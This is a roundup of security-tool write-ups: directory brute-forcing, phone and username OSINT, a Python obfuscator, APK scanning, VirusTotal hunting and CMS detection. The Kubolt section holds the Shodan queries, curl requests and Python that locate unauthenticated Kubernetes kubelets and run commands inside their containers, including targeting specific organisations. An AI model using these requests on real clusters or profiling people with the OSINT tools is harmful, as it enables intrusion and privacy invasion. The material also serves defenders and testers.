Rustbuster – DirBuster For Rust

DirBuster for Rust.

Usage

There are three modules currently implemented:

Dirbuster (default)

    rustbuster -m dir -u http://localhost:3000/ -w examples/wordlist -e php

Dnsbuster

    rustbuster -m dns -u google.com -w examples/wordlist

Vhostbuster

    rustbuster -m vhost -u http://localhost:3000/ -w examples/wordlist -d test.local -x "Hello"

~ rustbuster v. 1.2.0 ~ by phra & ps1dr3x ~

USAGE:
    rustbuster [FLAGS] [OPTIONS] --url <url> --wordlist <wordlist>

FLAGS:
    -f, --append-slash        Tries to also append / to the base request
    -K, --exit-on-error       Exits on connection errors
    -h, --help                Prints help information
    -k, --ignore-certificate  Disables TLS certificate validation
        --no-banner           Skips initial banner
        --no-progress-bar     Disables the progress bar
    -V, --version             Prints version information
    -v, --verbose             Sets the level of verbosity

OPTIONS:
    -d, --domain <domain>                               Uses the specified domain
    -e, --extensions <extensions>                       Sets the extensions [default: ]
    -b, --http-body <http-body>                         Uses the specified HTTP body [default: ]
    -H, --http-header <http-header>...                  Appends the specified HTTP header
    -X, --http-method <http-method>                     Uses the specified HTTP method [default: GET]
    -S, --ignore-status-codes <ignore-status-codes>     Sets the list of status codes to ignore [default: 404]
    -x, --ignore-string <ignore-string>...              Ignores results with specified string in vhost mode
    -s, --include-status-codes <include-status-codes>   Sets the list of status codes to include [default: ]
    -m, --mode <mode>                                   Sets the mode of operation (dir, dns, fuzz) [default: dir]
    -o, --output <output>                               Saves the results in the specified file [default: ]
    -t, --threads <threads>                             Sets the amount of concurrent requests [default: 10]
    -u, --url <url>                                     Sets the target URL
    -a, --user-agent <user-agent>                       Uses the specified User-Agent [default: rustbuster]
    -w, --wordlist <wordlist>                           Sets the wordlist

Note that -b sets the request body (the original help text mislabels it as the method; -X is the method). The -x ignore string matters in vhost mode because a server with a catch-all default virtual host answers 200 for every Host header you try, so without filtering on a string from the default page every candidate looks like a hit.

Download Rustbuster
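The following is an added example, not rustbuster's own code: a minimal dir-mode and vhost-mode brute-forcer in Python that shows what the -e, -f, -S and -x options do to the candidate list and the result filter. It runs against a constructed stand-in HTTP server on loopback (the paths, virtual hosts and default page are made up), so the whole thing works offline.

```python
"""Added example, not rustbuster's own code: dir-mode and vhost-mode
brute-forcing against a constructed stand-in server on 127.0.0.1."""
import http.server
import threading
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# Constructed fixture: what the stand-in server "knows". Unknown virtual hosts
# fall through to a catch-all default page, which is exactly why -x exists.
KNOWN_PATHS = {"/admin/": 200, "/index.php": 200, "/backup.php": 403}
KNOWN_VHOSTS = {"dev.test.local": b"dev site"}
DEFAULT_PAGE = b"Hello from the default site"

# Ignore proxy environment variables so loopback requests go straight through.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class StandInHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        if self.path in KNOWN_PATHS:
            code, body = KNOWN_PATHS[self.path], b"ok"
        elif self.path == "/":
            code, body = 200, KNOWN_VHOSTS.get(host, DEFAULT_PAGE)
        else:
            code, body = 404, b"not found"
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind the stand-in on a free loopback port; returns (server, base_url)."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), StandInHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def fetch(url, host=None):
    """GET url and return (status, body). urllib raises on 4xx/5xx, so the
    status is recovered from the exception; vhost mode overrides Host."""
    req = urllib.request.Request(url, headers={"User-Agent": "rustbuster"})
    if host:
        req.add_header("Host", host)
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def candidates(words, extensions=(), append_slash=False):
    """Expand a wordlist the way -e and -f do: word, word.ext, word/."""
    for word in words:
        yield "/" + word
        for ext in extensions:
            yield f"/{word}.{ext}"
        if append_slash:
            yield f"/{word}/"


def dirbust(base, words, extensions=(), append_slash=False,
            ignore_codes=(404,), threads=10):
    """dir mode: every candidate path whose status is not in ignore_codes (-S)."""
    paths = list(candidates(words, extensions, append_slash))
    with ThreadPoolExecutor(threads) as pool:
        hits = pool.map(lambda p: (p, fetch(base + p)[0]), paths)
    return {p: code for p, code in hits if code not in ignore_codes}


def vhostbust(base, words, domain, ignore_strings=(), threads=10):
    """vhost mode: same IP, Host: <word>.<domain>; drop bodies containing an
    ignore string (-x) so the catch-all default page does not flood the results."""
    def probe(host):
        code, body = fetch(base + "/", host=host)
        return host, code, body.decode(errors="replace")
    with ThreadPoolExecutor(threads) as pool:
        hits = pool.map(probe, [f"{w}.{domain}" for w in words])
    return {host: code for host, code, body in hits
            if code != 404 and not any(s in body for s in ignore_strings)}


if __name__ == "__main__":
    server, base_url = start_server()
    print(dirbust(base_url, ["admin", "index", "backup", "nothing"],
                  extensions=["php"], append_slash=True))
    print(vhostbust(base_url, ["dev", "admin"], "test.local", ignore_strings=["Hello"]))
    server.shutdown()
```

Running it prints the 403 for /backup.php alongside the 200s, because only 404 is ignored by default; the second vhost call without ignore_strings would also report admin.test.local, which is the catch-all page, not a real virtual host.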

Link: http://feedproxy.google.com/~r/PentestTools/~3/HFSIPHDgci8/rustbuster-dirbuster-for-rust.html

PhoneInfoga – Advanced Information Gathering & OSINT Tool For Phone Numbers

PhoneInfoga is one of the most advanced tools to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone number with very good accuracy, and then search for footprints on search engines to try to find the VoIP provider or identify the owner.

Features

- Check if a phone number exists and is possible
- Gather standard information such as country, line type and carrier
- OSINT footprinting using external APIs, Google hacking, phone books and search engines
- Check for reputation reports, social media, disposable numbers and more
- Scan several numbers at once
- Use custom formatting for more effective OSINT reconnaissance
- Automatic footprinting on several custom formats

Download PhoneInfoga

Link: http://www.kitploit.com/2019/06/phoneinfoga-advanced-information.html

Intensio-Obfuscator – Obfuscate A Python Code 2.X And 3.X

Takes Python source code and transforms it into obfuscated Python code: replaces the names of variables, classes and functions with random characters of a defined length, removes comments and line breaks, and adds to each line a random script with always-different values.

Requirement

Python >= 3.5

Files supported

Files written in Python 2.x and 3.x

Installation

    git clone https://github.com/Hnfull/Intensio-Obfuscator.git
    cd Intensio-Obfuscator/intensio/

Features

    Feature       Description
    Replace       Replace all names of variables, classes and functions defined, and remove all line breaks
    Padding       Add random scripts after each line and remove all line breaks
    Remove        Remove all comments and all line breaks
    Secret        Only for the curious :)
    Mixer lower   Generate words with 32 chars that replace variables, classes and functions defined in the source code and in random scripts, if 'replace' or 'padding' features are specified
    Mixer medium  Generate words with 64 chars that replace variables, classes and functions defined in the source code and in random scripts, if 'replace' or 'padding' features are specified
    Mixer high    Generate words with 128 chars that replace variables, classes and functions defined in the source code and in random scripts, if 'replace' or 'padding' features are specified

Usage

    -h, --help           show this help message and exit.
    -f, --onefile        if only one file.
    -d, --multiplefiles  if multiple files (project).
    -i, --input          source file or directory; if multiple files, indicate a directory that contains all your files.
    -c, --code           language used in input file or directory. value: [python]
    -o, --output         output file or directory that will be obfuscated; if multiple files, indicate an empty directory that will contain all your files.
    -m, --mixer          length level of variables mix output. values: [lower,medium,high]
    -r, --replace        activate the 'replace' obfuscation feature.
    -p, --padding        activate the 'padding' obfuscation feature.
    -rm, --remove        activate the 'remove' obfuscation feature.
    -s, --secret         activate the 'secret' feature.

If you want to exclude Python variables, classes or functions that would otherwise be taken by the 'replace' feature, edit intensio/exclude_python_words.txt. If you want to include Python variables, classes or functions that are not included when launching the 'replace' feature, edit intensio/include_python_words.txt.

Do not give your local variables, classes or functions the same names as Python keywords or as functions or classes of imported Python libraries!

Examples

Python target file(s):

Multiple files, basic:

    python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/basic/input/basicRAT -c python -o test/python/multiplefiles/basic/output/basicRAT -m lower -r -rm

(-i is the source directory of the project, -o the output directory of the project.)

Multiple files, advanced:

    python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/advanced/input/basicRAT -c python -o test/python/multiplefiles/advanced/output/basicRAT -m high -r -p -rm

(-i is the source directory of the project, -o the output directory of the project.)

If it is one file only, the command is the same as for multiple files: just point -i and -o at a Python file directly instead of a directory, and replace the -d parameter with -f.

Possible malfunctions

- If a variable, class or function has the same name as a word between ' ' or " " in a print() call, that text will be replaced with the mixed variable, class or function name as well (the replacement is textual, not syntax-aware).
- If a variable, class or function has the same name as a word after # (a comment), that text will also be replaced; but if it sits between """ or ''' without a variable before it, no replacement is performed.
- If you name your variables, classes or functions the same way as Python keywords or as functions or classes of imported Python libraries, an error may appear. Edit intensio/exclude_python_words.txt to add the names not to obfuscate, or rename your local variables, classes or functions; if one of them has the same name as a keyword it will be obfuscated and errors will appear.

Todo

Version 1.0.1-x: code optimization, fix bugs and problems, improve features already present
Version 1.1.0: support files written in C
Version 1.2.0: support files written in C++

Disclaimer

Intensio-Obfuscator is for education/research purposes only. The author takes NO responsibility for how you choose to use any of the tools provided.

Download Intensio-Obfuscator
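As an added example (my own code, not Intensio-Obfuscator's), the following implements the 'replace' idea on the syntax tree instead of on text: names the module itself defines are renamed to random identifiers of a chosen length (32/64/128 for the lower/medium/high mixer levels), keywords, builtins and imported names are left alone, and the round trip through the AST drops comments the way the 'remove' feature does. Because string literals are Constant nodes rather than Names, the print() malfunction listed above cannot happen here; the one caveat it shares with the tool is that an attribute of an imported object that happens to share a name with something you defined gets renamed too. The sample module is constructed; ast.unparse needs Python 3.9 or newer.

```python
"""Added example, not Intensio-Obfuscator's own code: AST-based 'replace'
(rename module-defined names) plus comment removal via ast.unparse."""
import ast
import builtins
import keyword
import random
import string

# Constructed input: a small module with a function, a class and a global.
SAMPLE_SOURCE = '''
import math

GREETING = "hello"

def area(radius):
    # comment: removed by the round trip through the AST
    return math.pi * radius ** 2

class Shape:
    def __init__(self, radius):
        self.radius = radius

    def describe(self):
        return GREETING + " " + str(area(self.radius))

result = Shape(2).describe()
'''


def defined_names(tree):
    """Names this module defines: functions, classes, parameters, assigned
    names and self.<field> stores. Imported names are removed by the caller."""
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.ClassDef)):
            names.add(node.name)
        elif isinstance(node, ast.arg):
            names.add(node.arg)
        elif isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
            names.add(node.id)
        elif isinstance(node, ast.Attribute) and isinstance(node.ctx, ast.Store):
            names.add(node.attr)
    return names


class Renamer(ast.NodeTransformer):
    def __init__(self, defined, length, seed=None):
        self.defined, self.length = defined, length  # 32/64/128 ~ lower/medium/high
        self.rng, self.mapping = random.Random(seed), {}
        # the equivalent of exclude_python_words.txt: keywords, builtins, dunders
        self.protected = set(keyword.kwlist) | set(dir(builtins))

    def rename(self, name):
        if name in self.protected or name.startswith("__") or name not in self.defined:
            return name
        if name not in self.mapping:
            alphabet = string.ascii_letters + string.digits
            self.mapping[name] = (self.rng.choice(string.ascii_letters)  # no leading digit
                                  + "".join(self.rng.choices(alphabet, k=self.length - 1)))
        return self.mapping[name]

    def visit_FunctionDef(self, node):
        node.name = self.rename(node.name)
        return self.generic_visit(node)

    visit_ClassDef = visit_FunctionDef

    def visit_arg(self, node):
        node.arg = self.rename(node.arg)
        return self.generic_visit(node)

    def visit_Name(self, node):
        node.id = self.rename(node.id)
        return node

    def visit_Attribute(self, node):
        # obj.method() and self.field for things defined in this module; like
        # the tool, this also hits a library attribute that shares the name
        node.attr = self.rename(node.attr)
        return self.generic_visit(node)

    def visit_keyword(self, node):
        if node.arg is not None:  # f(param=...) for a renamed parameter
            node.arg = self.rename(node.arg)
        return self.generic_visit(node)


def obfuscate(source, length=32, seed=None):
    """Return (obfuscated source, {original name: new name})."""
    tree = ast.parse(source)
    imported = {(alias.asname or alias.name).split(".")[0]
                for node in ast.walk(tree)
                if isinstance(node, (ast.Import, ast.ImportFrom))
                for alias in node.names}
    renamer = Renamer(defined_names(tree) - imported, length, seed)
    tree = ast.fix_missing_locations(renamer.visit(tree))
    return ast.unparse(tree), renamer.mapping  # comments do not survive unparse


if __name__ == "__main__":
    code, mapping = obfuscate(SAMPLE_SOURCE, length=32, seed=1)
    print(code)
```

The mapping returned is what you keep for debugging: executing the original and the obfuscated module and comparing `result` through the mapping is the quickest check that a renaming pass did not break the program.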

Link: http://feedproxy.google.com/~r/PentestTools/~3/0dAHTVR5GAU/intensio-obfuscator-obfuscate-python.html

Yaazhini – Free Android APK & API Vulnerability Scanner

Yaazhini is a free vulnerability scanner for Android APKs and APIs. It is a user-friendly tool with which you can easily scan any APK or API of an Android application and find vulnerabilities. Yaazhini includes an API vulnerability scan, an APK vulnerability scan and a reporting section to generate a report.

System Requirements

    Operating systems    Mac OS X (64-bit), Windows (64-bit and 32-bit)
    RAM                  Minimum 4 GB of available memory; 16 GB required for larger Android apps
    Storage              10 GB of available disk space
    Dependency software  Java 1.8+

Advantages of Yaazhini

- Scan an Android APK with just one click
- Scan an Android application's REST API (emulator or device)
- Generate a report
- Free to use
- Easy to use

How to use the Yaazhini Android Application APK Scanner

1. Start the Yaazhini application.
2. Provide the project name.
3. Upload the APK file.
4. Click on the Upload & Scan button.
5. After the scan completes you can see all details of each vulnerability and generate the report.

Yaazhini - Android Application REST API Scanner

The REST API scanner can help you find the following issues:

- SQL injection
- Command injection
- Header injection
- Cross-site scripting (possibilities)
- Missing security headers
- Sensitive information disclosure in response headers
- Sensitive information disclosure in error messages
- Missing server-side input validation
- Unwanted use of HTTP methods
- Improper HTTP responses, and more

How to use the Yaazhini Android Application REST Scanner

1. Start the application.
2. Create a new project.
3. Add a new request in the created project.
4. Provide the proper headers, URL and data.
5. Save and run the scan from the menu bar.
6. After the scan completes, click on Generate Report in the menu bar.

Sample Reports for Yaazhini

Yaazhini Android APK Scanner sample report: the report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation of the risk and recommendations for the vulnerability. The vulnerabilities are ordered by risk level. Get here: Yaazhini Android APK Scanner Sample Report.

Yaazhini Mobile Application Scanner sample report: the report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation of the risk and recommendations for the vulnerability. The vulnerabilities are ordered by risk level. Get here: Yaazhini Mobile Application Scanner Sample Report.

Download Yaazhini

Link: http://feedproxy.google.com/~r/PentestTools/~3/6kC6ytwB1jU/yaazhini-free-android-apk-api.html

Vthunting – A Tiny Script Used To Generate Report About VirusTotal Hunting And Send It By Email, Slack Or Telegram

VirusTotal Hunting is a tiny tool based on the VT API version 3 that runs a daily, weekly or monthly report about malware hunting. The report can be sent via email, a Slack channel or Telegram. The tool can also be used from the CLI to get a report at any time. The default number of results is 10, but it can be increased or decreased in the config section. This tool only works with a VirusTotal Intelligence API key.

Report Example

The extract below is an example of a generated report (the ASCII banner is omitted):

    McAfee ATR | Thomas Roccia | @fr0gger_
    Get latest hunting notification from VirusTotal

    Latest report from 2018-12-24 10:20:30.158831
    -------------------------------------------------------------------------------------
    Rule name: FancyBear_ComputraceAgent
    Match date: 2018-12-24 17:38:17
    SHA256: f5157e5b8afe1f79f29c947449477d13ede3d7341699256e62966474a7ee1eb5
    Tags: [apt28, fancybear_computraceagent]
    -------------------------------------------------------------------------------------
    Rule name: Winexe_RemoteExecution
    Match date: 2018-12-24 15:01:15
    SHA256: 1e194647c05b0068c31cd443b5bcacc2dd41799e5d21a40e0c58adbad01c28c6
    Tags: [winexe_remoteexecution, apt28]
    -------------------------------------------------------------------------------------
    Rule name: hatman_compiled_python: hatman
    Match date: 2018-12-24 00:28:21
    SHA256: 14c64fc93ae68f01989db992bf8ee47ffd33edf66223b84f3fae52f9a843a03f
    Tags: [triton, hatman, hatman_compiled_python]
    -------------------------------------------------------------------------------------
    Rule name: Stuxnet_unpacked
    Match date: 2018-12-24 15:00:00
    SHA256: 86b05279bf4930ffc0c00e4fd22c8ab9e964e8d45d39bfca42e129b95dc33481
    Tags: [stuxnet, stuxnet_unpacked]
    -------------------------------------------------------------------------------------
    Rule name: Stuxnet
    Match date: 2018-12-24 14:59:59
    SHA256: 86b05279bf4930ffc0c00e4fd22c8ab9e964e8d45d39bfca42e129b95dc33481
    Tags: [stuxnet]
    -------------------------------------------------------------------------------------
    [truncated]

Getting Started

Just download the script:

    git clone https://github.com/fr0gger/vthunting

Then fill in the config section with your API keys and details:

    # Virus Total API
    VTAPI = ""
    number_of_result = ""  # 10 by default

    # Email configuration
    smtp_serv = "<SMTP_SERV>"
    smtp_port = ""
    gmail_login = "<EMAIL>"
    gmail_pass = "<APP_PASS>"  # app password
    gmail_dest = "<DEST_EMAIL>"

    # Slack Bot config
    SLACK_BOT_TOKEN = "<API>"
    SLACK_CHANNEL = "<SLACK_CHANNEL>"

    # Telegram Bot config
    TOKEN = "<API>"
    chat_id = "<CHAT_ID>"

Note that this puts an Intelligence API key, a mail password and two bot tokens in plain text inside the script itself; keep the file readable only by the account that runs it (chmod 600), which matters doubly once it is copied to /usr/local/bin as described below.

Once the config is ready you can run the file with:

    python vthunting.py --help
    usage: vthunting.py [OPTION]
        -h, --help              Print this help
        -r, --report            Print the VT hunting report
        -s, --slack_report      Send the report to a Slack channel
        -e, --email_report      Send the report by email
        -t, --telegram_report   Send the report to Telegram

Prerequisites

Requirements: you first need to install the requirements (requests, slackclient):

    pip install -r requirements.txt

VT API: get your API key from VirusTotal: https://developers.virustotal.com/v3.0/reference

Email configuration (Gmail): to create an app password you can find the documentation here: https://support.google.com/accounts/answer/185833

Slack bot configuration: to generate a token go here and follow the steps: https://api.slack.com/custom-integrations/legacy-tokens

Telegram bot configuration: to get a token you need to create a Telegram bot by talking to @BotFather, which will help you configure your bot and get your token. Once you have your token, visit https://api.telegram.org/bot<YOUR_TOKEN>/getUpdates to get the chat id.

Install in your system

If you want to be able to call this script from anywhere you can copy it, without the extension, into:

    cp vthunting.py /usr/local/bin/vthunting

Configure the task scheduler with crontab

You can use crontab to run the script and receive the report periodically:

    crontab -e

Below is an example that delivers the report every day at 10:15 am.

    # Example of job definition:
    # .---------------- minute (0 - 59)
    # |  .------------- hour (0 - 23)
    # |  |  .---------- day of month (1 - 31)
    # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
    # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # |  |  |  |  |
    # *  *  *  *  * user command to be executed
    15 10 * * * /usr/local/bin/vthunting -r -t -e -s >> vthunt.log

Download Vthunting
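As an added example (my own code, not vthunting's), here is the reporting step written so that a sample firing several rules is collapsed into one entry: in the report above the same SHA256 appears twice, once under Stuxnet_unpacked and once under Stuxnet. The input is a constructed list using only the fields the report prints; a real run would fill it from the VT v3 API, with the key read from the environment instead of from the script file. Nothing here talks to the network.

```python
"""Added example, not vthunting's own code: group hunting matches by file
hash and render them in the layout vthunting prints."""
import os
from collections import OrderedDict

# Constructed from the entries visible in the sample report above.
SAMPLE_MATCHES = [
    {"rule_name": "FancyBear_ComputraceAgent", "date": "2018-12-24 17:38:17",
     "sha256": "f5157e5b8afe1f79f29c947449477d13ede3d7341699256e62966474a7ee1eb5",
     "tags": ["apt28", "fancybear_computraceagent"]},
    {"rule_name": "Winexe_RemoteExecution", "date": "2018-12-24 15:01:15",
     "sha256": "1e194647c05b0068c31cd443b5bcacc2dd41799e5d21a40e0c58adbad01c28c6",
     "tags": ["winexe_remoteexecution", "apt28"]},
    {"rule_name": "Stuxnet_unpacked", "date": "2018-12-24 15:00:00",
     "sha256": "86b05279bf4930ffc0c00e4fd22c8ab9e964e8d45d39bfca42e129b95dc33481",
     "tags": ["stuxnet", "stuxnet_unpacked"]},
    {"rule_name": "Stuxnet", "date": "2018-12-24 14:59:59",
     "sha256": "86b05279bf4930ffc0c00e4fd22c8ab9e964e8d45d39bfca42e129b95dc33481",
     "tags": ["stuxnet"]},
]


def vt_api_key():
    """Keep the key out of the script: /usr/local/bin is world-readable.
    VT_API_KEY is an assumed variable name set in the cron job's environment."""
    key = os.environ.get("VT_API_KEY")
    if not key:
        raise RuntimeError("set VT_API_KEY in the cron job's environment")
    return key


def group_by_hash(matches, limit=10):
    """Newest first; a sample that fires several rules becomes one entry
    listing every rule and the union of their tags. limit mirrors
    number_of_result."""
    grouped = OrderedDict()
    for m in sorted(matches, key=lambda m: m["date"], reverse=True):
        entry = grouped.setdefault(m["sha256"], {"date": m["date"], "rules": [], "tags": []})
        entry["rules"].append(m["rule_name"])
        entry["tags"].extend(t for t in m["tags"] if t not in entry["tags"])
    return list(grouped.items())[:limit]


def render_report(matches, generated_at, limit=10):
    """Same layout as the report above, one block per distinct sample."""
    sep = "-" * 85
    lines = [f"Latest report from {generated_at}", sep]
    for sha256, entry in group_by_hash(matches, limit):
        lines += [f"Rule name: {', '.join(entry['rules'])}",
                  f"Match date: {entry['date']}",
                  f"SHA256: {sha256}",
                  f"Tags: [{', '.join(entry['tags'])}]", sep]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_report(SAMPLE_MATCHES, "2018-12-24 18:00:00"))
```

With the grouping, the two Stuxnet rules produce one block whose Rule name line reads "Stuxnet_unpacked, Stuxnet", and number_of_result counts samples rather than rule hits, so a noisy ruleset cannot crowd the other matches out of the report.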

Link: http://www.kitploit.com/2019/06/vthunting-tiny-script-used-to-generate.html

Userrecon-Py – Find Usernames In Social Networks

Find usernames in social networks.

Installation

Install dependencies (Debian/Ubuntu):

    sudo apt install python3 python3-pip

Install with pip3:

    sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git
    userrecon-py --help

Building from Source

Clone this repository, and:

    git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py
    sudo -H pip3 install -r requirements.txt
    python3 setup.py build
    sudo python3 setup.py install

Update

To update this tool to the latest version, run:

    sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git --upgrade
    userrecon-py --version

Usage

Start by printing the available actions by running userrecon-py --help. Then you can perform the following test:

    userrecon-py target decoxviii -o test1

Download Userrecon-Py

Link: http://feedproxy.google.com/~r/PentestTools/~3/XDi8ASQbqK0/userrecon-py-find-usernames-in-social.html

Kubolt – Utility For Scanning Public Kubernetes Clusters

Kubolt is a simple utility for scanning public, unauthenticated Kubernetes clusters and running commands inside their containers.

Why?

Sometimes the kubelet port 10250 is open to unauthorized access, which makes it possible to run commands inside the containers through the kubelet's getRun handler:

    // getRun handles requests to run a command inside a container.
    func (s *Server) getRun(request *restful.Request, response *restful.Response) {
        params := getExecRequestParams(request)
        pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
        if !ok {
            response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
            return
        }

How?

Okay, let's ask our friend Shodan. The basic query is:

    ssl:true port:10250 404

The kubelet uses port 10250 with SSL by default; 404 is the HTTP response for a request without a URL path. Kubolt asks Shodan through its API for a list of IP addresses and keeps them for other OSINT actions.

First, ask the kubelet for its running pods and keep only hosts whose response does not contain "Unauthorized" and does contain "containers", so that a command can be run inside one:

    curl -k https://IP-from-Shodan:10250/runningpods/

If you find a host without any running pods at the time, keep it for next time, when pods might have been started. You can list all available pods with either of these requests:

    curl -k https://IP-from-Shodan:10250/pods/
    # or
    curl http://IP-from-Shodan:10255/pods/

Next, Kubolt parses the response and generates a new request of the form (the kubelet's run route is /run/<namespace>/<pod>/<container>, with the pod's namespace and name taken from the pod list):

    curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>"

You can target companies more accurately using Shodan filters such as asn, org, country and net.

Install

    mkdir output
    pip install -r requirements.txt

Run

    python kubolt.py --query "asn:123123 org:'ACME Corporation'"
    # or
    python kubolt.py --query "org:'ACME Corporation' country:UK"

Shodan

Kubolt uses the Shodan API and spends query credits accordingly; if you run the tool without query filters you will probably burn through all your credits.

On the defensive side, the whole chain depends on the kubelet accepting anonymous requests. With anonymous authentication disabled and authorization delegated to the API server (the kubelet flags --anonymous-auth=false and --authorization-mode=Webhook), /runningpods/ and /run/ answer 401 Unauthorized to these probes, and the read-only port 10255 should not be reachable from the internet at all.

Important

The tool provided by the author should only be used for educational purposes. The author cannot be held responsible for misuse of the tool, nor for any direct or indirect damage caused by its use.

Download Kubolt
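As an added example (my own code, not Kubolt's), this is the step between /runningpods/ and /run/: the "Unauthorized"/"containers" filter, pulling every (namespace, pod, container) triple out of the PodList the kubelet returns, and building the POST with a URL-encoded cmd body. It runs offline on a constructed PodList (the pod and container names are made up; the PodList layout and the /run/<namespace>/<pod>/<container> route are the kubelet's); the request is built but never sent.

```python
"""Added example, not Kubolt's own code: parse a kubelet PodList and build
the /run/ request for each container, without sending anything."""
import json
import urllib.parse
import urllib.request

# Constructed /runningpods/ body: a PodList with two pods, one of which
# holds two containers (the kubelet's /pods/ endpoint returns the same shape).
RUNNING_PODS = json.dumps({
    "kind": "PodList",
    "items": [
        {"metadata": {"name": "web-7d9f", "namespace": "default"},
         "spec": {"containers": [{"name": "nginx"}, {"name": "log-shipper"}]}},
        {"metadata": {"name": "kube-proxy-x1", "namespace": "kube-system"},
         "spec": {"containers": [{"name": "kube-proxy"}]}},
    ],
})
UNAUTHORIZED = "Unauthorized"


def is_exposed(status, body):
    """Kubolt's filter: a 200 that is not Unauthorized and lists containers."""
    return status == 200 and UNAUTHORIZED not in body and '"containers"' in body


def parse_running_pods(body):
    """(namespace, pod, container) for every container in the PodList."""
    targets = []
    for item in json.loads(body).get("items", []):
        meta = item["metadata"]
        for container in item["spec"]["containers"]:
            targets.append((meta["namespace"], meta["name"], container["name"]))
    return targets


def run_url(kubelet, namespace, pod, container):
    """The kubelet's run route; all three path parts come from the PodList."""
    return f"{kubelet}/run/{namespace}/{pod}/{container}"


def build_run_request(kubelet, target, command):
    """The POST Kubolt sends: form body cmd=<command>, URL-encoded so a
    command containing '&', '/' or spaces survives the round trip."""
    namespace, pod, container = target
    data = urllib.parse.urlencode({"cmd": command}).encode()
    return urllib.request.Request(
        run_url(kubelet, namespace, pod, container), data=data,
        headers={"Content-Type": "application/x-www-form-urlencoded"})


if __name__ == "__main__":
    kubelet = "https://IP-from-Shodan:10250"
    if is_exposed(200, RUNNING_PODS):
        for target in parse_running_pods(RUNNING_PODS):
            req = build_run_request(kubelet, target, "id")
            print(req.get_method(), req.full_url, req.data)
```

Sending the built request needs the same -k behaviour as the curl lines above (the kubelet's serving certificate is usually self-signed), so a real run would pass an ssl context with verification disabled to urlopen; that is deliberately left out here.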

Link: http://feedproxy.google.com/~r/PentestTools/~3/snT7GJXlPRw/kubolt-utility-for-scanning-public.html

CMSeeK v1.1.2 – CMS Detection And Exploitation Suite – Scan WordPress, Joomla, Drupal And Over 170 Other CMSs

What is a CMS?

A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some notable examples are WordPress, Joomla and Drupal.

Release History

- Version 1.1.2 [19-05-2019]
- Version 1.1.1 [01-02-2019]
- Version 1.1.0 [28-08-2018]
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
...

See the changelog file for the full history.

Functions of CMSeeK

- Basic CMS detection of over 170 CMSs
- Drupal version detection
- Advanced WordPress scans: version detection, user enumeration (3 detection methods), plugin enumeration, theme enumeration, version vulnerability lookup and much more
- Advanced Joomla scans: version detection, backup file finder, admin page finder, core vulnerability detection, directory listing check, config leak detection, and various other checks
- Modular bruteforce system: use the pre-made bruteforce modules or create your own and integrate it

Requirements and Compatibility

CMSeeK is built with Python 3; you will need Python 3 to run this tool, and it is compatible with Unix-based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update, so make sure git is installed.

Installation and Usage

It is fairly easy to use CMSeeK; just make sure you have python3 and git (only for cloning the repo) installed and use the following commands:

    git clone https://github.com/Tuhinshubhra/CMSeeK
    cd CMSeeK
    pip/pip3 install -r requirements.txt

For guided scanning:

    python3 cmseek.py

Otherwise:

    python3 cmseek.py -u [...]

Help menu from the program:

    USAGE:
        python3 cmseek.py (for guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification>

    SPECIFYING TARGET:
        -u URL, --url URL         Target URL
        -l LIST, --list LIST      Path of the file containing the list of sites for multi-site scan (comma separated)

    MANIPULATING SCAN:
        -i cms, --ignore--cms cms Specify which CMS IDs to skip in order to avoid false positives, separated by comma ","
        --strict-cms cms          Check target against a list of provided CMS IDs, separated by comma ","
        --skip-scanned            Skip target if its CMS was previously detected.

    RE-DIRECT:
        --follow-redirect         Follow all/any redirect(s)
        --no-redirect             Skip all redirects and test the input target(s)

    USER AGENT:
        -r, --random-agent        Use a random user agent
        --googlebot               Use the Googlebot user agent
        --user-agent USER_AGENT   Specify a custom user agent

    OUTPUT:
        -v, --verbose             Increase output verbosity

    VERSION & UPDATING:
        --update                  Update CMSeeK (requires git)
        --version                 Show CMSeeK version and exit

    HELP & MISCELLANEOUS:
        -h, --help                Show this help message and exit
        --clear-result            Delete all the scan results

    EXAMPLE USAGE:
        python3 cmseek.py -u example.com                        # Scan example.com
        python3 cmseek.py -l /home/user/target.txt              # Scan the sites listed in target.txt (comma separated)
        python3 cmseek.py -u example.com --user-agent Mozilla 5.0  # Scan example.com using the custom user agent "Mozilla 5.0"
        python3 cmseek.py -u example.com --random-agent         # Scan example.com using a random user agent
        python3 cmseek.py -v -u example.com                     # Enable verbose output while scanning example.com

Checking for Updates

You can check for updates either from the main menu or with python3 cmseek.py --update, which checks for an update and applies it automatically. Please make sure you have git installed: CMSeeK uses git to apply the auto-update.

Detection Methods

CMSeeK detects the CMS via the following:

- HTTP headers
- Generator meta tag
- Page source code
- robots.txt

Supported CMSs

